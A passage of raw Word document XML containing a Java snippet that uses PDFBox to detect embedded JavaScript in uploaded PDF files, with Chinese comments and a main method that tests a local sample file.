                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">     **/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27388620" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    public static </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>containsJavaScript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">File file) throws </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IOException</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E7E380A" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PDDocument</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> document = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PDDocument.load</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(file);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B38BD3D" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        return </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>containsJavaScript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(document);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AC08C54" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67D42AB6" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51776ACC" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    /**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D48F66A" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">     * 校验pdf文件是否包含</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>js</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>脚本</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23222656" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">     **/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70258562" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    public static </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>containsJavaScript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>InputStream</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> input) throws </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IOException</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A7B0021" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PDDocument</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> document = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PDDocument.load</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(input);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BC0D1D3" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">        return </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>containsJavaScript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(document);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F3E4B56" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13DD3195" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="27C3E70A" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    /**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2183302B" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">     * 校验pdf文件是否包含</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>js</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>脚本，这里使用分页解析，因为对于大pdf文件（文字较多），会出现加载问题。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40DBAAAD" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">     **/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462F8C82" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">public static </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>containsJavaScript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PDDocument</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> document) </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">{  </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">  //Getting the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PDDocumentInformation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> object    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PDPageTree</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> pages = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>document.getPages</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">);   </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> return </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IntStream.range</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">(0, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>pages.getCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>anyMatch</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> -&gt; </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">{  </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">      //return </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>str.contains</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">("JavaScript") || </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>str.contains</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>("</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>COSName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>JS}"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">);   </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">     return </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>pages.get</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>getCOSObject</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>toString</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>).contains</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>("</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>COSName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>JS}"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">);   </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> });}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="292E3304" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1256D5EF" w14:textId="6C67E77C" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">public static void main(String </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">[]) throws </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IOException</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> {    //Loading an existing document    String s1 = "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>xss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">注入测试.pdf";    File </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> = new File("C:\\Users\\Administrator\\Desktop\\" + s1);    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> b = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>containsJavaScript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">(file);    if (b) {        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>System.out.println</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>("pdf文件包含，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>js</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>脚本代码");    }}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="730F5A5A" w14:textId="77777777" w:rsidR="003674C3" w:rsidRDefault="003674C3" w:rsidP="003674C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5D4865" w14:textId="77777777" w:rsidR="00870DD3" w:rsidRDefault="00870DD3" w:rsidP="009F55E8">
      <w:pPr>
        <w:ind w:firstLineChars="1100" w:firstLine="2420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="256CA354" w14:textId="77777777" w:rsidR="00870DD3" w:rsidRDefault="00870DD3" w:rsidP="009F55E8">
      <w:pPr>
        <w:ind w:firstLineChars="1100" w:firstLine="2420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE04822" w14:textId="77777777" w:rsidR="00870DD3" w:rsidRDefault="00870DD3" w:rsidP="009F55E8">
      <w:pPr>
        <w:ind w:firstLineChars="1100" w:firstLine="2420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695A3B32" w14:textId="77777777" w:rsidR="00870DD3" w:rsidRDefault="00870DD3" w:rsidP="009F55E8">
      <w:pPr>
        <w:ind w:firstLineChars="1100" w:firstLine="2420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545D9B34" w14:textId="77777777" w:rsidR="00870DD3" w:rsidRDefault="00870DD3" w:rsidP="009F55E8">
      <w:pPr>
        <w:ind w:firstLineChars="1100" w:firstLine="2420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5E6511" w14:textId="77777777" w:rsidR="00870DD3" w:rsidRDefault="00870DD3" w:rsidP="009F55E8">
      <w:pPr>
        <w:ind w:firstLineChars="1100" w:firstLine="2420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D486C30" w14:textId="77777777" w:rsidR="00870DD3" w:rsidRDefault="00870DD3" w:rsidP="009F55E8">
      <w:pPr>
        <w:ind w:firstLineChars="1100" w:firstLine="2420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
